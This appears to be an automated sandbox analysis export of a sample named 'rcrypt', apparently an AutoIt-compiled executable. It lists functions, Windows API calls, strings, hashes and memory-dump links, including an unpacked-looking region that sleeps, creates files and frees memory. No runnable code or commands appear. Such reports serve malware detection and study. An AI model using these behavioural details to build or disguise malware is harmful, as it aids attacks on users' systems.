Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: f442ae20c2f0fb243eb895c4549ab109d23df8955330cc3d943a1b56ff1b6e29
Instruction ID: 6cc73c080f0756fa8927df6a7618fba9d5160fe4a22ee1650fa8e832aa29b045
Opcode Fuzzy Hash: f442ae20c2f0fb243eb895c4549ab109d23df8955330cc3d943a1b56ff1b6e29
Instruction Fuzzy Hash: 04115E75240704AFD7218B65EC58F677BB9EBC9B11F20416CF609C6660DB61EC819660

Function 00154696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0012E7C1), ref: 001546A6
FindFirstFileW.KERNELBASE(?,?), ref: 001546B7
FindClose.KERNEL32(00000000), ref: 001546C7

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: cb0cbbb6f01dc6bc12f5fd4878b15753444106cfb8b5b153580892a1defda98e
Instruction ID: f520152a15a241bd81d13b5dfba701d47cffe3d1d0904f9433727835edefad2a
Opcode Fuzzy Hash: cb0cbbb6f01dc6bc12f5fd4878b15753444106cfb8b5b153580892a1defda98e
Instruction Fuzzy Hash: 09E020318144009B42106738EC4D4EB776CDF0633AF100719FC79C24E0E7B09DD486D9

Function 000FE800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 0013428C

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: c33f5275d3d02961e0753699210bf75ca977c21f7390986e2ddc9fa064b68add
Instruction ID: 30319eb73bdca5cf6ef6e2bb7318594802a3b2eab0e7719bfc0653ec431feed9
Opcode Fuzzy Hash: c33f5275d3d02961e0753699210bf75ca977c21f7390986e2ddc9fa064b68add
Instruction Fuzzy Hash: 0DA28D74A04249CFCB24CF58C480ABEB7F1FF58300F648169EA16AB761D775AD82DB91

Function 00100B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00100BBB
timeGetTime.WINMM ref: 00100E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00100FB3
TranslateMessage.USER32(?), ref: 00100FC7
DispatchMessageW.USER32(?), ref: 00100FD5
Sleep.KERNEL32(0000000A), ref: 00100FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 0010105A
DestroyWindow.USER32 ref: 00101066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00101080
Sleep.KERNEL32(0000000A,?,?), ref: 001352AD
TranslateMessage.USER32(?), ref: 0013608A
DispatchMessageW.USER32(?), ref: 00136098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001360AC

Strings

@GUI_CTRLID, xrefs: 00135364
@COM_EVENTOBJ, xrefs: 0013591A
@GUI_WINHANDLE, xrefs: 001353B9
@TRAY_ID, xrefs: 00135BB9
@GUI_CTRLHANDLE, xrefs: 0013540E

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4003667617-3242690629
Opcode ID: 58f88b8b1107980f0bef690cc514c33f089495dc6e035c317ccd862799d4e20e
Instruction ID: e99b79b897cd0cda2c0f721e031959ad964195106342ca36965ab801cf52ec32
Opcode Fuzzy Hash: 58f88b8b1107980f0bef690cc514c33f089495dc6e035c317ccd862799d4e20e
Instruction Fuzzy Hash: A5B2E470608741DFD729DF24C884BAAB7E6FF84704F14491DF58A972A1DBB0E885DB82

Function 001593DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001591E9: __time64.LIBCMT ref: 001591F3

Part of subcall function 000F5045: _fseek.LIBCMT ref: 000F505D

__wsplitpath.LIBCMT ref: 001594BE

Part of subcall function 0011432E: __wsplitpath_helper.LIBCMT ref: 0011436E

_wcscpy.LIBCMT ref: 001594D1
_wcscat.LIBCMT ref: 001594E4
__wsplitpath.LIBCMT ref: 00159509
_wcscat.LIBCMT ref: 0015951F
_wcscat.LIBCMT ref: 00159532

Part of subcall function 0015922F: _memmove.LIBCMT ref: 00159268
Part of subcall function 0015922F: _memmove.LIBCMT ref: 00159277

_wcscmp.LIBCMT ref: 00159479

Part of subcall function 001599BE: _wcscmp.LIBCMT ref: 00159AAE
Part of subcall function 001599BE: _wcscmp.LIBCMT ref: 00159AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 001596DC
_wcsncpy.LIBCMT ref: 0015974F
DeleteFileW.KERNEL32(?,?), ref: 00159785
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0015979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001597AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001597BE

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 75e5a50b53033cbef25171164c04ccaee77f9a342a42ffce959643be90991ce7
Instruction ID: 7a8f0cb47b7e88c03bae9675e3f0377e25b7b0aa0f05d0960a3c14b8efe24a7d
Opcode Fuzzy Hash: 75e5a50b53033cbef25171164c04ccaee77f9a342a42ffce959643be90991ce7
Instruction Fuzzy Hash: 9AC13CB1D00219EACF15DF94CC85EDEB7BDAF58301F0040AAF619E7151EB309A898F65

Function 000F3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 000F3074
RegisterClassExW.USER32(00000030), ref: 000F309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000F30AF
InitCommonControlsEx.COMCTL32(?), ref: 000F30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000F30DC
LoadIconW.USER32(000000A9), ref: 000F30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000F3101

Strings

+, xrefs: 000F305D
TaskbarCreated, xrefs: 000F30A4
0, xrefs: 000F3056
AutoIt v3 GUI, xrefs: 000F3090

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 08480aeba827ecf58b77a83de888a69ac23437f256672012ec31b516ec26f17c
Instruction ID: d1a85d5f8bd8acff609758279815deb4fcacdcc915c2930e564a047b5ac345ef
Opcode Fuzzy Hash: 08480aeba827ecf58b77a83de888a69ac23437f256672012ec31b516ec26f17c
Instruction Fuzzy Hash: 98313871844349EFDB41DFA4E885ADABBF0FB09310F14456EE584A66A0E3B905C6CF50

Function 000F3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 000F3074
RegisterClassExW.USER32(00000030), ref: 000F309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000F30AF
InitCommonControlsEx.COMCTL32(?), ref: 000F30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000F30DC
LoadIconW.USER32(000000A9), ref: 000F30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000F3101

Strings

+, xrefs: 000F305D
TaskbarCreated, xrefs: 000F30A4
0, xrefs: 000F3056
AutoIt v3 GUI, xrefs: 000F3090

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: c9b13fc0542578c145f1bcafd29030c9790c5f8b0aa7e364d75aa92f5123d54c
Instruction ID: e048c712e6264f417c55acdc077ceadd8a90d6f8602d65a882647f16162febf4
Opcode Fuzzy Hash: c9b13fc0542578c145f1bcafd29030c9790c5f8b0aa7e364d75aa92f5123d54c
Instruction Fuzzy Hash: A121C5B5940318AFDB00DFA4EC49B9EBBF5FB08710F00422AF514A66A0D7B545858F91

Function 000F71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000F4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001B62F8,?,000F37C0,?), ref: 000F4882

Part of subcall function 0011074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,000F72C5), ref: 00110771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000F7308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0012ECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0012ED32
RegCloseKey.ADVAPI32(?), ref: 0012ED70
_wcscat.LIBCMT ref: 0012EDC9

Strings

Software\AutoIt v3\AutoIt, xrefs: 000F72FE
\, xrefs: 0012EDEC
Include, xrefs: 0012ECE8, 0012ED29
\Include\, xrefs: 000F72C5

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 6a9345e8c3ff120fb051056ec42c4e844b7ac0cf8f0268db72a9246d8d8bb5dc
Instruction ID: df7e01d3db479f8a7a34342903b7efc433a34498cea0042936a7ac1cd8fb161f
Opcode Fuzzy Hash: 6a9345e8c3ff120fb051056ec42c4e844b7ac0cf8f0268db72a9246d8d8bb5dc
Instruction Fuzzy Hash: 7271AF714083059EC714EF65EC819ABBBF8FF98340F44096EF549D36A1DB309989CB62

Function 000F3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 000F3A62
LoadCursorW.USER32(00000000,00007F00), ref: 000F3A71
LoadIconW.USER32(00000063), ref: 000F3A88
LoadIconW.USER32(000000A4), ref: 000F3A9A
LoadIconW.USER32(000000A2), ref: 000F3AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000F3AD2
RegisterClassExW.USER32(?), ref: 000F3B28

Part of subcall function 000F3041: GetSysColorBrush.USER32(0000000F), ref: 000F3074
Part of subcall function 000F3041: RegisterClassExW.USER32(00000030), ref: 000F309E
Part of subcall function 000F3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000F30AF
Part of subcall function 000F3041: InitCommonControlsEx.COMCTL32(?), ref: 000F30CC
Part of subcall function 000F3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000F30DC
Part of subcall function 000F3041: LoadIconW.USER32(000000A9), ref: 000F30F2
Part of subcall function 000F3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000F3101

Strings

#, xrefs: 000F3B0D
AutoIt v3, xrefs: 000F3B17
0, xrefs: 000F3B06

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 1ee9b8c8dba168b824f25e00a4a332eab248ea92077e46cce384c8ae5e8aff5e
Instruction ID: 97ab78c98729bc503b61e63993cbb750e7c6053416c45473b1dbced84699f093
Opcode Fuzzy Hash: 1ee9b8c8dba168b824f25e00a4a332eab248ea92077e46cce384c8ae5e8aff5e
Instruction Fuzzy Hash: F0215171D00308AFEB159FA4EC05BAE7BB4FB18711F004269F604A66A0D7BD5994DF44

Function 000F3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 000F36D2
KillTimer.USER32(?,00000001), ref: 000F36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000F371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000F372A
CreatePopupMenu.USER32 ref: 000F373E
PostQuitMessage.USER32(00000000), ref: 000F375F

Strings

TaskbarCreated, xrefs: 000F3725

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: e9565af2075c4122f0b8ff1b2a7dc7d94144daf704bebe0714068186ace79263
Instruction ID: 281244031b40f37ea52a82a9512bb47ae8cae25759197c911c19b2b3e8505bdd
Opcode Fuzzy Hash: e9565af2075c4122f0b8ff1b2a7dc7d94144daf704bebe0714068186ace79263
Instruction Fuzzy Hash: A641E9B110420DBBDB347B24EC49BBE37A5EB14351F140229FB02D6EE1DB689D91B661

Function 000F3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3OutputDebug, xrefs: 000F38A4
/AutoIt3ExecuteScript, xrefs: 000F38CE
CMDLINERAW, xrefs: 000F380D
/AutoIt3ExecuteLine, xrefs: 000F38B9
CMDLINE, xrefs: 000F3834
/ErrorStdOut, xrefs: 000F388F
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 000F37C0

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 31a8cdc32a4c670acbaed9d097435dabb470547485cf7b096330a7d8f2031439
Instruction ID: b09abac425dd7916cd7a1811a607ae2a84bec8a4a7540748dd939bf4672b9ff9
Opcode Fuzzy Hash: 31a8cdc32a4c670acbaed9d097435dabb470547485cf7b096330a7d8f2031439
Instruction Fuzzy Hash: 33A16B7281422DAADF04EFA0DC91AFEB778BF24310F040129F616B7592DF749A49DB60

Function 016F25D0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 016F26A1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 016F28C7

Memory Dump Source

Source File: 00000000.00000002.1319460756.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_rcrypt.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction ID: e97c374a70c82f91e0566878b278a72be5d115142569b899f12b21ff6a69a5e8
Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction Fuzzy Hash: D9A10674E04209EBDB14CFA4C8A4BEEBBB5BF48304F20815DE611BB280D7759A85CF94

Function 000F39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000F3A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000F3A36
ShowWindow.USER32(00000000,?,?), ref: 000F3A4A
ShowWindow.USER32(00000000,?,?), ref: 000F3A53

Strings

AutoIt v3, xrefs: 000F3A0D, 000F3A12, 000F3A13
edit, xrefs: 000F3A30

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 9ee6cd732228ebece568969d53c405f391d2b393e53e5160728d1c826d7f12bb
Instruction ID: 7b69fa887c1881f5475c37bd61b80fef2538da1351c2c991768b2b7aa8858862
Opcode Fuzzy Hash: 9ee6cd732228ebece568969d53c405f391d2b393e53e5160728d1c826d7f12bb
Instruction Fuzzy Hash: 29F0FE716412907EFA311B27AC4DE7B3E7DD7D6F50F00426EB904A2670C7B91891DAB0

Function 016F23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 016F22A0: Sleep.KERNELBASE(000001F4), ref: 016F22B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 016F24C0

Strings

UP6UMYORPTPAW6, xrefs: 016F2523, 016F2526

Memory Dump Source

Source File: 00000000.00000002.1319460756.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_rcrypt.jbxd

Similarity

API ID: CreateFileSleep
String ID: UP6UMYORPTPAW6
API String ID: 2694422964-959352197
Opcode ID: 5a140aeb89f99619482bc0486f9e4ede101b48f6ff61d0f32a2be3ba740e9bfc
Instruction ID: a42cdf6a4ae4216b7a07df794dac17a9bb42fd50f77ce3ce0aab94e72a14446d
Opcode Fuzzy Hash: 5a140aeb89f99619482bc0486f9e4ede101b48f6ff61d0f32a2be3ba740e9bfc
Instruction Fuzzy Hash: FE515C31D14249EBEF11DBA4CC68BEEBB79AF14300F00819DA619BB2C0D7B55A45CB65

Function 0011564D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 001156AB
_memcpy_s.LIBCMT ref: 0011571D
__read_nolock.LIBCMT ref: 0011577B
__filbuf.LIBCMT ref: 0011579E
_memset.LIBCMT ref: 001157E2

Part of subcall function 00118D68: __getptd_noexit.LIBCMT ref: 00118D68

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction ID: 33e347252693417f9b0a24722e5025c401b3b57e8fa02e498a25039bc6a60180
Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
Instruction Fuzzy Hash: 67518270A00B05DBDB2C9EA9C8856EE77A3AF90320F648739F835962D0D7709D90CB90

Function 000F69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000F4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001B62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000F4F6F

_free.LIBCMT ref: 0012E68C
_free.LIBCMT ref: 0012E6D3

Part of subcall function 000F6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000F6D0D

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0012E462
Bad directive syntax error, xrefs: 0012E6BB

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
